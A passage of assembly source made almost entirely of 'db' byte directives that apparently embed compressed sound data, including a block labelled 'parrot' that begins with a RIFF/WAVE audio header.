37,160,32,106,173,162,7,250,104,64,224,167,164,20,239,253 + db 77,255,81,147,255,214,100,65,127,251,63,86,246,179,127,150 + db 255,227,20,196,204,7,128,139,7,32,9,132,16,9,146,58 + db 19,68,74,139,1,202,250,33,223,164,232,40,206,90,117,118 + db 187,74,36,127,253,147,70,234,255,248,68,81,255,247,69,40 + db 255,227,20,196,209,9,128,122,247,32,67,12,100,125,9,255 + db 95,250,188,158,160,122,227,131,42,250,148,34,55,169,28,152 + db 205,251,230,57,191,242,19,161,189,74,207,253,116,255,202,176 + db 255,227,20,196,206,8,65,43,3,32,0,196,32,88,234,17 + db 255,17,81,174,16,124,36,62,245,148,60,250,234,130,130,174 + db 237,255,235,245,236,111,255,111,244,237,255,204,2,10,29,156 + db 255,227,20,196,208,8,65,82,255,32,16,10,224,59,245,99 + db 107,120,217,209,12,46,229,15,32,73,153,62,172,19,144,111 + db 254,142,46,127,247,31,234,71,203,60,252,190,198,0,77,65 + db 255,227,20,196,210,8,193,86,255,32,56,15,96,207,35,250 + db 125,188,208,243,151,70,250,81,12,32,99,255,250,22,167,246 + db 252,250,110,169,250,169,207,30,32,67,104,203,49,174,134,172 + db 255,227,20,196,210,9,1,218,247,32,40,27,33,249,221,80 + db 129,140,62,56,35,77,103,70,204,181,209,220,54,223,255,250 + db 217,245,59,244,83,128,177,18,196,225,149,75,150,133,87,128 + db 255,227,20,196,209,9,129,155,11,32,0,74,0,133,224,87 + db 136,33,204,80,144,35,94,237,231,118,101,39,123,126,95,255 + db 191,255,253,237,246,247,213,193,148,98,42,6,66,84,98,180 + db 255,227,20,196,206,8,193,155,7,32,56,140,220,100,159,245 + db 67,149,24,208,17,177,128,165,109,110,79,86,64,250,150,207 + db 179,242,153,60,31,200,178,26,253,172,159,77,127,248,68,0 + db 255,227,20,196,206,8,1,159,7,32,0,202,32,186,223,81 + db 228,20,181,64,121,103,99,129,134,156,248,209,151,241,209,109 + db 39,63,254,201,255,191,204,253,190,132,250,41,192,80,233,27 + db 255,227,20,196,209,9,1,154,243,32,56,89,48,229,255,249 + db 137,100,69,28,128,167,106,198,76,174,132,21,208,169,68,34 + db 134,253,85,127,254,179,222,151,55,14,150,248,177,37,255,128 + db 255,227,20,196,208,8,57,162,255,32,56,5,97,0,84,62 + db 19,104,217,76,176,101,91,131,162,244,172,121,53,251,143,175 + db 147,63,207,82,255,245,36,21,58,88,22,168,21,114,222,93 + db 255,227,20,196,210,8,169,162,255,32,56,15,41,231,215,161 + db 207,136,191,250,17,95,66,103,56,181,183,43,128,59,41,190 + db 5,163,121,240,47,249,65,192,191,38,161,4,16,89,202,209 + db 255,227,20,196,210,9,65,194,251,32,0,196,52,151,71,239 + db 147,56,98,200,2,153,205,3,73,158,247,220,120,94,95,212 + db 107,83,250,45,79,158,209,245,136,48,152,217,127,176,142,28 + db 255,227,20,196,208,8,129,151,11,32,40,79,49,34,85,62 + db 244,127,79,81,178,23,122,136,86,230,151,87,245,81,36,138 + db 233,188,96,127,251,210,173,198,89,242,208,205,176,70,74,159 + db 255,227,20,196,209,9,1,158,247,32,56,11,96,255,239,163 + db 237,82,54,86,48,204,235,253,88,112,23,17,59,231,30,255 + db 244,239,255,173,27,250,2,49,12,18,202,191,221,191,235,160 + db 255,227,20,196,208,8,0,146,243,32,10,74,44,76,158,90 + db 109,147,130,60,206,143,247,226,158,172,16,34,101,67,63,47 + db 250,255,212,189,78,200,159,17,19,222,39,4,3,20,57,245 + db 255,227,20,196,211,10,128,138,231,114,17,144,40,250,146,107 + db 250,137,191,17,161,95,92,16,148,2,121,133,50,179,142,45 + db 151,155,250,182,87,229,108,34,202,221,202,103,0,63,208,10 + db 255,227,20,196,204,7,193,75,11,32,16,68,240,35,77,94 + db 161,255,202,152,143,133,202,218,95,119,66,10,84,5,193,18 + db 230,164,200,134,3,235,126,160,250,101,226,194,13,110,72,117 + db 255,227,20,196,208,9,129,70,251,32,56,79,40,233,235,72 + db 115,233,149,158,214,6,143,171,7,9,187,118,87,242,229,33 + db 125,170,61,35,86,56,116,152,25,118,52,58,224,112,126,11 + db 255,227,20,196,205,8,65,74,255,32,56,85,12,59,23,52 + db 192,151,193,146,60,167,95,118,37,211,38,61,195,178,76,128 + db 131,26,25,165,208,51,40,253,96,47,44,251,31,253,227,254 + db 255,227,20,196,207,7,193,74,247,32,56,7,96,234,108,255 + db 249,31,229,201,124,176,25,87,10,148,73,135,114,84,154,138 + db 132,87,130,70,50,72,171,41,159,230,167,235,251,174,166,143 + db 255,227,20,196,211,9,193,74,231,112,24,69,12,126,123,183 + db 133,65,37,59,136,73,63,110,194,210,36,255,255,229,120,231 + db 90,237,21,234,249,80,52,56,181,179,123,255,254,182,255,215 + db 255,227,20,196,207,9,65,82,235,32,16,5,32,255,214,106 + db 11,14,223,241,63,92,55,80,111,212,6,33,127,23,134,134 + db 83,253,127,253,191,244,255,242,128,190,255,253,70,200,34,76 + db 255,227,20,196,205,8,128,114,239,32,0,70,0,125,42,248 + db 139,90,244,167,152,121,153,21,8,105,255,234,113,1,69,57 + db 206,66,54,223,228,35,88,132,35,82,152,12,1,11,58,191 + db 255,227,20,196,206,10,0,211,7,32,2,6,16,248,161,184 + db 253,31,201,171,232,255,160,8,30,26,48,12,2,138,203,253 + db 2,96,231,20,57,76,229,43,123,100,26,81,231,21,255,244 + db 255,227,20,196,201,7,192,138,247,33,77,16,0,127,212,189 + db 64,253,93,105,252,32,51,42,118,61,21,59,80,60,10,39 + db 103,254,57,254,52,211,27,192,240,253,10,103,180,68,255,220 + db 255,227,20,196,205,11,65,103,3,33,134,56,0,159,48,63 + db 61,127,47,243,223,194,201,128,199,140,10,74,190,255,255,241 + db 23,168,30,128,50,95,254,208,246,76,121,97,222,47,251,212 + db 255,227,20,196,195,8,1,50,247,33,200,104,0,226,125,235 + db 183,215,74,185,132,30,122,112,128,73,201,76,253,223,175,255 + db 237,179,190,107,227,195,44,201,10,5,106,99,92,78,15,142 + db 255,227,20,196,198,6,65,50,251,32,0,84,72,115,95,15 + db 255,213,255,232,97,95,230,237,103,35,64,32,136,194,16,162 + db 191,157,168,229,148,183,34,218,224,199,30,53,236,102,167,103 + db 255,227,20,196,208,9,129,58,247,32,2,10,52,17,86,107 + db 127,48,0,232,4,204,103,12,249,84,172,148,255,239,187,244 + db 255,254,137,247,189,140,101,173,28,162,2,229,2,195,36,104 + db 255,227,20,196,205,7,193,39,3,32,0,74,136,207,112,160 + db 88,62,156,188,149,96,24,60,143,240,113,166,61,66,195,1 + db 230,117,4,89,212,98,128,22,92,22,89,223,98,214,26,230 + db 255,227,20,196,209,8,193,38,251,32,0,150,92,60,128,3 + db 142,138,46,73,214,8,94,144,144,179,34,199,82,82,210,74 + db 75,218,126,70,70,28,223,225,146,127,132,199,2,44,173,65 + db 255,227,20,196,209,7,185,63,3,32,0,76,145,239,253,73 + db 74,180,127,128,0,10,56,95,172,24,220,209,43,19,140,26 + db 61,0,255,107,151,8,188,216,79,255,241,181,181,1,215,171 + db 255,227,20,196,213,10,193,74,255,32,8,140,116,232,216,199 + db 214,236,207,159,137,105,80,166,108,104,250,182,59,219,169,14 + db 32,0,1,31,255,57,20,62,31,23,127,12,26,62,65,20 + db 255,227,20,196,205,7,193,119,7,32,8,5,68,191,67,255 + db 244,255,106,161,80,5,12,245,85,125,81,157,180,196,46,113 + db 41,173,238,151,223,134,231,173,233,133,91,83,172,239,215,40 + db 255,227,20,196,209,9,185,138,247,32,0,202,85,196,85,190 + db 79,81,48,24,87,162,175,117,182,144,80,0,21,116,99,231 + db 4,225,4,101,74,55,62,187,193,39,43,186,141,186,63,171 + db 255,227,20,196,205,7,64,114,239,32,0,10,0,221,87,144 + db 131,63,166,84,102,14,15,11,226,163,250,91,230,103,185,181 + db 231,235,202,230,198,167,71,207,32,187,214,125,191,197,155,246 + db 255,227,20,196,211,10,129,50,231,132,24,71,40,127,184,151 + db 0,215,230,121,50,96,64,105,53,87,214,140,189,196,136,163 + db 220,141,76,67,166,8,36,80,36,109,226,116,153,16,116,127 + db 255,227,20,196,204,8,193,50,231,116,24,68,184,117,206,127 + db 202,249,43,5,85,27,44,95,147,58,151,255,202,191,179,47 + db 41,170,192,32,38,38,12,136,215,108,139,191,255,247,1,63 + db 255,227,20,196,204,8,128,218,247,32,2,202,76,156,0,46 + db 32,204,11,28,66,169,38,18,12,43,122,187,233,207,14,244 + db 195,139,44,70,71,70,176,21,163,146,91,127,233,1,30,16 + db 255,227,20,196,205,8,128,218,239,32,1,222,112,41,166,73 + db 17,192,127,113,0,0,149,33,39,69,96,33,43,141,130,32 + db 38,177,12,89,115,69,254,32,114,169,154,231,159,167,211,200 + db 255,227,20,196,206,8,64,210,251,32,1,82,136,111,146,166 + db 127,90,191,136,128,0,12,155,73,87,152,24,25,210,47,40 + db 2,57,31,203,252,175,246,14,222,152,59,241,35,182,122,126 + db 255,227,20,196,208,9,0,206,247,32,0,152,108,212,89,41 + db 71,253,38,213,4,207,79,127,253,232,70,255,127,83,171,244 + db 255,151,255,251,161,0,8,182,127,182,132,33,8,0,103,224 + db 255,227,20,196,207,8,0,218,247,32,0,76,104,255,255,255 + db 130,207,255,250,255,206,220,32,127,243,102,69,37,255,179,63 + db 220,214,204,120,124,79,97,140,64,194,168,152,149,241,22,183 + db 255,227,20,196,210,8,192,246,239,32,1,134,80,126,40,239 + db 136,29,253,63,245,111,255,208,134,175,255,102,83,127,252,196 + db 185,116,238,138,67,129,14,28,2,5,135,3,207,146,63,143 + db 255,227,20,196,210,10,64,146,231,132,8,68,16,220,158,244 + db 255,152,193,162,143,253,237,177,127,211,209,204,106,211,102,111 + db 232,159,204,184,8,112,162,64,76,65,167,122,29,16,41,198 + db 255,227,20,196,204,8,192,2,231,172,0,0,0,204,255,212 + db 224,97,0,128,159,106,252,4,95,239,255,207,52,243,75,192 + db 247,251,127,253,120,72,65,22,16,166,90,3,202,61,189,128 + db 255,227,20,196,204,8,65,18,231,156,16,68,152,43,68,158 + db 235,200,97,85,174,121,93,63,156,116,255,201,97,58,60,213 + db 199,119,107,254,68,143,253,78,216,137,104,146,61,209,84,170 + db 255,227,20,196,206,8,1,166,243,32,2,68,104,31,72,189 + db 188,193,94,196,168,129,45,229,135,252,231,44,150,199,215,29 + db 119,161,0,179,17,186,198,118,109,223,229,245,237,33,142,44 + db 255,227,20,196,209,8,233,178,251,32,56,76,189,151,231,110 + db 164,126,237,165,87,179,99,92,254,182,126,17,169,240,32,116 + db 125,33,86,185,43,244,82,146,45,104,118,194,33,95,252,161 + db 255,227,20,196,208,8,185,170,255,32,8,10,41,85,58,238 + db 116,34,185,243,141,159,63,235,62,223,242,73,214,77,212,241 + db 33,6,106,55,10,244,192,57,53,80,191,223,14,224,9,35 + db 255,227,20,196,208,8,121,206,251,32,56,4,201,170,243,215 + db 168,245,37,193,0,184,203,250,86,255,255,250,237,178,213,253 + db 231,103,211,167,182,199,65,4,58,1,154,216,192,177,5,184 + db 255,227,20,196,209,9,57,178,243,32,16,82,221,165,63,79 + db 255,227,192,248,3,82,159,255,0,255,255,149,28,244,242,36 + db 252,171,235,248,212,139,3,129,112,12,75,35,187,32,99,114 + db 255,227,20,196,207,8,121,174,239,32,8,76,221,63,27,75 + db 254,225,0,2,8,58,47,255,163,42,41,77,246,161,221,54 + db 217,61,232,71,8,194,192,3,136,2,112,85,212,245,253,73 + db 255,227,20,196,208,9,121,170,231,32,24,74,125,255,228,141 + db 87,148,65,4,5,137,20,148,207,252,233,255,254,223,209,171 + db 117,35,50,157,200,87,14,65,193,103,185,191,213,184,216,197 + db 255,227,20,196,205,7,0,2,239,32,0,0,0,255,215,204 + db 36,33,60,168,4,225,88,206,139,237,239,250,242,245,55,49 + db 118,208,207,111,51,148,168,40,248,137,225,161,157,236,142,61 + db 255,227,20,196,212,10,49,14,235,32,24,70,181,196,76,8 + db 255,191,93,77,9,80,154,205,51,171,216,167,74,61,110,12 + db 38,243,17,183,66,86,133,218,198,199,138,155,163,56,175,106 + db 255,227,20,196,206,8,65,110,251,32,2,68,100,144,78,113 + db 154,54,194,6,19,218,26,41,43,215,175,209,121,146,253,216 + db 193,181,74,6,211,179,190,143,119,47,131,141,179,239,31,212 + db 255,227,20,196,208,8,129,122,251,32,56,82,216,27,189,223 + db 78,125,94,5,136,66,213,38,18,113,41,106,92,179,95,235 + db 176,250,205,168,85,200,123,250,73,150,63,189,83,5,135,10 + db 255,227,20,196,209,8,129,107,3,32,0,68,132,26,107,84 + db 128,94,159,170,109,0,0,128,80,169,147,138,67,162,0,86 + db 195,48,162,245,183,251,82,61,41,135,20,247,179,165,237,104 + db 255,227,20,196,210,9,1,83,3,32,9,132,196,23,81,154 + db 190,81,139,242,19,14,51,208,32,0,64,229,144,62,85,163 + db 157,209,197,19,241,99,40,97,16,20,49,73,34,163,85,115 + db 255,227,20,196,209,9,129,66,247,32,8,4,128,201,5,0 + db 167,84,183,78,57,111,32,160,225,41,254,133,189,9,85,73 + db 201,228,224,152,169,80,247,133,3,1,96,48,53,121,221,9 + db 255,227,20,196,206,7,128,6,239,32,0,0,0,214,223,119 + db 163,215,118,166,251,28,202,95,110,191,194,0,174,86,116,0 + db 72,21,139,206,179,255,119,255,255,75,171,15,104,35,83,5 + db 255,227,20,196,211,10,121,18,231,114,8,4,193,127,212,0 + db 42,1,165,250,32,29,98,128,225,98,42,217,69,71,34,117 + db 53,169,253,27,125,10,170,49,11,38,78,44,200,222,138,63 + db 255,227,20,196,204,8,192,2,231,120,0,0,0,156,20,130 + db 50,12,62,39,90,39,71,33,66,184,117,96,115,226,161,240 + db 124,155,207,172,78,254,8,107,63,195,22,164,31,7,205,191 + db 255,227,20,196,204,8,192,2,231,127,64,0,0,79,245,135 + db 255,160,121,8,154,13,121,225,55,170,41,8,65,38,232,249 + db 3,4,157,175,33,154,180,50,225,143,22,35,83,178,45,6 + db 255,227,20,196,204,12,0,143,19,33,136,16,0,152,135,34 + db 132,167,229,81,231,160,30,72,5,225,12,8,115,182,131,94 + db 58,247,177,123,20,73,123,54,182,141,223,74,211,110,221,95 + db 255,227,20,196,191,7,64,31,11,33,204,0,0,161,128,53 + db 130,8,161,95,96,191,46,150,110,155,20,65,9,85,46,189 + db 53,25,20,118,65,90,180,186,251,255,177,141,101,226,255,96 + db 255,227,20,196,197,5,192,55,7,32,43,6,0,198,38,49 + db 208,128,238,17,143,156,48,46,161,175,74,29,74,189,43,123 + db 39,207,33,13,48,179,137,26,89,130,83,117,144,143,4,157 + db 255,227,20,196,209,8,128,46,255,32,122,210,0,46,48,107 + db 24,252,191,212,230,30,12,9,2,226,50,68,155,67,77,83 + db 162,44,110,133,133,75,9,101,64,68,182,87,208,111,170,46 + db 255,227,20,196,210,9,192,79,7,32,105,134,4,223,119,255 + db 69,95,68,215,7,8,177,36,13,175,134,16,8,60,235,71 + db 251,210,147,54,213,63,111,214,167,249,82,187,61,159,232,244 + db 255,227,20,196,206,9,0,75,15,32,72,134,8,127,164,1 + db 226,124,101,111,26,1,201,90,48,15,132,65,209,173,155,101 + db 60,208,179,156,9,178,80,254,23,192,107,162,223,86,182,109 + db 255,227,20,196,205,7,128,115,3,32,121,68,4,254,159,169 + db 31,16,228,12,187,116,193,33,4,94,60,170,51,201,161,81 + db 244,216,177,35,132,69,30,27,139,158,95,2,252,123,227,59 + db 255,227,20,196,210,8,128,83,3,32,120,204,0,58,191,240 + db 194,240,44,99,232,20,189,207,82,104,224,88,24,151,88,28 + db 129,48,67,201,176,106,26,232,128,187,202,8,20,24,176,44 + db 255,227,20,196,211,10,128,58,255,32,24,68,32,48,48,61 + db 251,125,43,142,51,218,83,145,112,86,179,168,171,65,115,251 + db 119,239,177,86,196,88,84,183,175,189,49,68,13,21,12,150 + db 255,227,20,196,204,8,128,111,11,32,10,70,16,103,245,208 + db 44,245,151,122,208,175,225,172,100,147,48,66,241,79,34,248 + db 251,73,200,75,21,77,94,245,104,234,30,164,15,59,59,253 + db 255,227,20,196,205,7,192,94,255,32,11,204,0,57,141,85 + db 255,148,25,65,150,2,21,38,20,194,124,44,220,56,10,223 + db 1,66,32,81,87,157,132,140,132,255,87,237,129,41,99,83 + db 255,227,20,196,209,9,0,59,3,32,67,204,0,70,130,219 + db 26,148,127,10,104,128,79,5,132,0,65,56,62,240,124,31 + db 7,242,231,192,162,71,65,255,202,6,46,170,173,31,148,236 + db 255,227,20,196,208,8,192,86,239,32,195,18,4,250,255,155 + db 133,8,0,193,40,152,30,63,36,222,89,137,0,9,148,29 + db 42,10,176,54,52,233,209,159,115,50,178,38,123,249,145,183 + db 255,227,20,196,208,10,192,58,251,32,122,18,0,117,172,143 + db 213,161,130,76,140,25,185,140,76,154,214,14,215,137,7,106 + db 78,151,45,101,251,83,214,180,39,184,219,21,238,216,229,122 + db 255,227,20,196,200,8,128,147,7,32,120,140,28,191,7,66 + db 246,98,35,0,34,94,153,102,88,128,208,121,6,164,213,20 + db 48,74,194,215,119,105,13,65,36,201,105,108,183,103,255,37 + db 255,227,20,196,201,7,128,82,251,32,120,78,0,244,186,247 + db 255,95,34,163,23,76,27,230,137,24,177,82,42,157,84,95 + db 187,19,241,158,218,199,184,119,119,181,84,93,180,255,251,118 + db 255,227,20,196,206,9,64,78,239,32,122,76,8,127,255,253 + db 31,12,113,180,6,212,209,128,216,115,51,40,103,89,125,27 + db 79,60,101,199,252,31,113,38,175,255,230,32,128,112,36,111 + db 255,227,20,196,204,7,192,54,255,32,8,70,0,255,249,136 + db 107,32,229,162,90,191,255,246,136,114,123,112,33,70,87,255 + db 255,204,83,49,132,42,230,74,73,40,255,255,255,239,13,14 + db 255,227,20,196,208,9,64,79,11,32,10,80,4,125,69,194 + db 64,104,203,121,87,46,242,52,62,42,160,119,183,219,148,88 + db 210,233,227,220,41,241,230,146,111,237,121,199,105,166,174,18 + db 255,227,20,196,206,8,0,106,239,32,30,24,0,223,173,199 + db 75,252,54,131,65,108,243,49,224,171,76,19,15,85,13,255 + db 132,81,6,235,46,165,81,109,247,98,241,162,182,248,110,48 + db 255,227,20,196,209,9,192,102,231,36,193,152,32,234,105,16 + db 243,25,127,211,255,220,159,74,0,193,216,248,172,196,155,204 + db 194,99,22,186,213,153,112,42,131,10,172,27,58,10,185,223 + db 255,227,20,196,205,8,128,98,231,37,88,0,0,167,169,95 + db 233,73,232,137,135,17,93,206,34,8,22,240,65,217,112,252 + db 31,148,4,61,0,252,16,118,93,240,127,255,255,147,154,124 + db 255,227,20,196,206,18,129,226,251,33,143,48,0,224,192,40 + db 41,172,0,162,105,25,65,201,40,24,57,55,108,75,254,234 + db 170,41,255,253,205,51,167,176,76,223,11,177,250,26,157,203 + db 255,227,20,196,167,11,128,139,7,33,143,48,0,61,106,61 + db 220,158,37,13,121,51,104,251,254,119,255,213,172,36,224,36 + db 93,165,14,2,195,239,187,245,84,191,157,207,84,6,138,167 + db 255,227,20,196,156,6,128,78,247,33,207,0,0,87,191,250 + db 191,4,7,132,161,120,26,146,187,228,119,51,128,238,227,141 + db 157,231,205,221,179,249,119,237,117,44,125,90,127,232,229,191 + db 255,227,20,196,165,7,64,102,235,32,96,68,160,255,232,179 + db 110,175,42,33,127,51,233,3,175,2,231,102,127,60,167,51 + db 198,102,71,77,54,216,187,12,48,177,78,70,133,7,197,10 + db 255,227,20,196,171,7,64,82,251,32,8,198,4,18,84,172 + db 132,101,173,165,187,191,208,235,100,144,53,238,119,242,21,199 + db 85,129,6,34,187,13,86,191,229,121,16,68,234,113,170,132 + db 255,227,20,196,177,7,0,59,7,32,11,12,4,103,17,156 + db 26,91,18,35,28,156,137,229,14,187,108,204,156,230,6,170 + db 138,230,163,232,87,153,31,91,119,95,242,91,64,117,90,150 + db 255,227,20,196,184,6,0,58,251,32,43,204,0,32,64,42 + db 203,91,217,32,103,80,27,17,72,42,147,171,35,136,122,57 + db 58,249,124,215,44,191,45,84,69,167,109,255,254,133,187,249 + db 255,227,20,196,195,6,0,43,3,32,106,198,0,29,44,233 + db 250,255,12,193,124,4,131,43,17,5,18,211,137,45,228,212 + db 103,96,172,25,0,17,121,223,254,162,61,155,191,255,249,90 + db 255,227,20,196,206,9,0,98,231,39,88,0,0,255,105,187 + db 187,165,0,87,120,0,33,209,210,35,193,6,122,143,3,195 + db 240,222,127,128,139,220,193,230,102,126,103,251,191,255,248,35 + db 255,227,20,196,205,16,241,218,243,33,152,40,1,204,255,216 + db 149,130,48,184,80,184,165,18,41,42,26,17,12,89,101,27 + db 251,126,111,252,59,200,242,191,212,123,249,95,80,5,170,48 + db 255,227,20,196,172,10,129,2,255,33,140,16,0,2,128,57 + db 85,163,105,169,99,137,50,44,36,127,254,161,47,254,86,207 + db 241,117,210,73,63,171 +parrot: + db 82,73,70,70,46,35,0,0,87,65,86,69,102,109,116,32 + db 30,0,0,0,85,0,1,0,17,43,0,0,208,7,0,0 + db 1,0,0,0,12,0,1,0,2,0,0,0,104,0,1,0 + db 113,5,102,97,99,116,4,0,0,0,128,193,0,0,100,97 + db 116,97,240,34,0,0,255,227,32,196,0,18,129,84,197,185 + db 73,72,2,170,103,34,82,48,5,14,92,86,79,34,2,75 + db 20,48,186,54,232,128,80,225,65,133,209,137,214,10,6,21 + db 4,12,8,193,48,218,74,49,104,49,116,109,210,4,25,12 + db 177,91,105,10,5,12,67,39,61,81,2,4,8,246,8,16 + db 66,245,66,118,212,20,32,138,52,116,43,109,74,0,17,129 + db 98,64,168,84,40,1,253,38,66,193,224,207,250,218,255,227 + db 32,196,17,25,1,122,101,185,143,64,32,141,226,227,249,244 + db 207,23,241,194,231,134,73,59,252,92,176,252,8,49,84,127 + db 254,33,135,225,229,56,176,42,7,137,79,255,83,241,115,241 + db 40,144,109,23,95,255,158,64,120,127,86,114,18,55,66,191 + db 156,40,225,113,81,84,167,243,224,252,129,245,57,223,252,167 + db 46,31,167,242,159,253,193,135,151,120,62,4,253,95,0,50 + db 227,205,74,165,155,39,255,227,32,196,8,24,1,26,114,93 + db 143,72,0,11,32,0,182,69,101,210,170,51,153,106,26,141 + db 226,224,234,79,221,252,204,142,223,76,135,170,125,128,185,129 + db 220,38,70,132,157,36,17,48,204,102,114,71,181,83,132,104 + db 88,73,74,76,129,2,86,172,18,131,72,29,89,217,139,92 + db 240,108,218,140,169,133,28,128,107,98,255,203,127,255,244,127 + db 237,232,56,196,121,94,151,255,255,209,163,69,131,119,255,227 + db 32,196,3,23,1,22,170,253,140,73,32,85,121,54,219,201 + db 91,132,64,1,82,0,236,68,15,201,225,64,224,81,50,78 + db 62,72,195,151,9,4,194,213,86,52,169,60,160,161,178,54 + db 133,42,52,227,80,153,213,25,59,107,8,166,85,251,4,6 + db 20,97,134,157,108,203,114,122,129,137,215,97,188,21,15,201 + db 30,26,15,188,121,66,7,216,174,142,191,255,250,63,255,255 + db 255,127,253,95,53,170,255,227,32,196,2,22,66,114,174,121 + db 130,104,0,222,166,206,140,133,14,5,2,0,165,76,237,108 + db 244,103,3,74,209,212,50,208,78,182,94,187,25,184,193,213 + db 170,131,92,200,240,231,10,192,108,127,249,169,46,128,159,143 + db 32,230,127,254,74,32,74,18,136,26,23,63,255,245,166,201 + db 186,8,32,159,255,255,255,201,69,166,95,55,155,255,255,133 + db 203,162,144,193,207,255,255,47,57,211,96,54,32,12,255,227 + db 32,196,4,23,1,98,230,91,143,72,0,8,5,2,129,128 + db 0,1,62,241,175,154,96,185,149,48,88,169,146,231,97,125 + db 189,253,160,161,39,56,17,220,146,149,22,216,143,24,49,81 + db 110,71,163,171,206,87,26,127,94,192,177,210,201,201,140,148 + db 47,166,197,44,137,118,2,232,80,24,37,184,206,31,217,190 + db 44,24,1,175,133,186,31,242,186,173,239,254,255,175,255,254 + db 18,1,255,0,64,4,255,227,32,196,3,19,65,58,229,231 + db 204,64,0,216,77,182,159,59,92,61,59,48,1,227,243,221 + db 61,189,51,104,232,57,191,118,177,113,52,84,128,208,95,180 + db 254,177,5,88,128,109,215,255,42,170,57,238,57,234,57,71 + db 24,128,53,237,5,206,37,197,138,138,191,255,255,213,188,223 + db 202,28,32,14,44,252,63,240,255,228,233,178,159,135,65,0 + db 8,183,137,169,180,173,179,245,135,208,4,52,111,243,255,227 + db 32,196,17,18,193,70,230,142,89,196,148,148,44,11,2,70 + db 255,26,144,23,3,193,99,47,204,4,4,12,231,254,97,70 + db 113,46,159,82,149,74,9,207,131,64,201,81,24,68,8,22 + db 103,211,255,244,200,235,101,132,130,167,10,28,139,211,78,175 + db 210,164,177,109,211,151,48,0,29,20,127,205,74,12,46,187 + db 110,217,128,132,1,191,183,214,153,129,76,57,1,252,209,20 + db 191,205,151,27,191,18,255,227,32,196,33,18,64,182,218,150 + db 51,76,116,153,251,131,254,161,41,215,244,130,168,249,101,5 + db 120,165,132,190,160,163,116,184,12,37,100,96,157,44,24,107 + db 255,197,189,212,1,77,63,160,61,8,127,232,0,1,164,1 + db 184,242,172,135,32,101,0,213,238,24,103,8,93,77,202,168 + db 77,228,2,67,228,66,166,234,57,18,229,56,43,26,15,156 + db 168,26,36,11,194,53,7,91,235,64,156,249,200,170,255,227 + db 32,196,51,19,0,118,211,248,70,18,98,3,76,119,135,63 + db 85,93,100,95,210,20,89,210,200,239,175,254,212,87,110,192 + db 34,219,156,79,180,128,29,140,39,110,221,63,44,87,175,202 + db 149,247,27,21,89,127,168,233,112,238,122,169,132,24,8,0 + db 57,9,246,203,98,78,252,169,114,161,56,201,191,212,232,21 + db 188,249,2,138,18,230,199,28,38,17,36,113,214,19,107,245 + db 0,193,34,250,208,11,255,227,32,196,66,24,192,250,209,254 + db 193,196,228,122,22,212,23,16,126,134,40,104,227,151,169,2 + db 10,148,6,56,39,103,68,255,175,86,24,15,172,49,133,157 + db 197,138,122,63,177,0,2,166,169,187,133,93,154,168,118,137 + db 232,115,145,111,160,160,216,23,25,42,222,153,195,131,5,173 + db 91,46,15,179,168,195,248,169,238,76,34,18,212,144,19,208 + db 144,176,155,162,194,136,89,144,136,10,242,101,204,181,255,227 + db 32,196,58,19,128,142,230,30,27,88,76,67,162,97,162,209 + db 103,15,101,254,134,37,125,223,75,2,182,180,162,245,255,239 + db 0,3,140,36,56,246,166,173,166,247,65,107,30,129,213,182 + db 244,11,176,252,6,70,175,233,182,1,9,217,99,28,8,136 + db 176,64,91,197,68,84,168,88,74,56,0,225,81,15,107,158 + db 125,193,14,166,39,204,50,195,86,168,186,90,248,177,106,255 + db 255,255,22,90,69,156,255,227,32,196,71,18,0,130,229,254 + db 122,146,108,143,240,2,32,48,178,42,181,128,222,10,162,149 + db 46,152,128,11,198,39,172,170,198,112,212,146,213,79,174,183 + db 86,244,90,134,47,240,64,84,252,99,63,231,47,228,71,111 + db 156,168,233,213,5,149,58,59,10,40,208,211,74,21,42,232 + db 179,200,136,203,128,188,239,255,255,255,224,44,112,5,63,128 + db 0,0,0,1,244,6,208,123,152,144,45,66,233,177,255,227 + db 32,196,90,18,193,150,209,78,107,196,228,198,245,92,49,70 + db 224,42,66,251,41,130,223,58,161,8,149,252,120,139,126,113 + db 191,205,37,252,120,107,252,210,95,217,23,154,145,225,21,151 + db 217,10,180,231,227,163,99,186,29,254,207,255,255,253,180,66 + db 135,123,63,145,64,0,25,100,17,175,140,193,139,6,33,212 + db 76,76,173,219,106,155,112,21,85,255,218,55,255,173,82,227 + db 51,6,38,102,99,240,255,227,32,196,106,18,1,218,195,248 + db 30,14,46,172,205,254,204,171,255,177,177,241,155,171,86,175 + db 25,128,140,168,241,98,205,6,143,21,37,195,129,222,13,127 + db 45,255,255,252,187,227,95,217,213,225,32,49,229,130,191,45 + db 186,190,252,64,138,218,40,68,42,147,149,25,21,236,255,124 + db 250,164,155,133,217,235,46,70,213,209,140,132,16,244,120,117 + db 115,29,156,172,121,240,70,2,96,227,19,52,132,188,255,227 + db 32,196,125,19,129,106,163,248,121,134,106,239,230,95,224,83 + db 204,191,151,239,221,79,33,73,254,154,223,250,233,123,96,140 + db 83,250,118,251,38,212,215,245,38,234,34,250,209,2,125,20 + db 1,64,48,6,1,1,64,145,3,7,196,119,241,255,35,82 + db 188,223,173,205,134,249,106,247,40,87,179,169,153,29,15,123 + db 19,122,53,171,209,135,50,234,239,157,146,150,63,123,53,105 + db 151,235,81,41,235,181,255,227,32,196,138,20,67,142,119,248 + db 16,85,174,147,102,246,63,85,77,191,253,75,255,255,183,79 + db 255,6,69,63,102,79,250,221,248,186,136,127,64,177,162,33 + db 226,221,178,141,181,6,74,84,102,151,169,66,215,200,121,179 + db 177,100,100,87,248,138,124,202,247,65,204,255,246,73,231,150 + db 165,72,139,98,172,101,124,212,167,62,210,34,167,229,29,27 + db 208,181,255,181,44,189,52,175,213,230,231,245,93,235,255,227 + db 32,196,148,20,131,10,72,74,72,148,252,170,95,213,189,191 + db 250,180,21,25,246,211,95,181,22,187,91,173,8,57,13,190 + db 159,0,1,190,253,145,169,202,100,121,64,243,50,176,144,237 + db 52,200,189,51,233,223,236,70,207,151,252,65,121,103,76,182 + db 116,57,191,117,153,149,59,154,247,116,242,234,216,87,222,102 + db 189,25,193,55,217,200,142,170,122,175,106,213,123,79,77,253 + db 43,116,116,228,254,189,255,227,32,196,157,22,3,146,76,50 + db 72,206,220,191,254,12,138,116,158,121,152,185,23,118,174,164 + db 219,217,98,63,117,81,65,210,80,198,68,172,128,68,106,209 + db 13,173,168,100,235,84,201,23,165,186,204,35,103,217,150,78 + db 121,10,178,231,118,200,203,84,33,235,82,246,107,24,118,121 + db 36,211,249,15,249,14,167,62,54,69,11,50,221,22,74,98 + db 255,225,89,243,246,255,255,248,42,51,254,239,229,181,255,227 + db 32,196,160,21,131,10,99,248,24,149,200,236,47,51,0,29 + db 122,252,144,140,4,8,51,61,179,89,191,50,62,99,105,118 + db 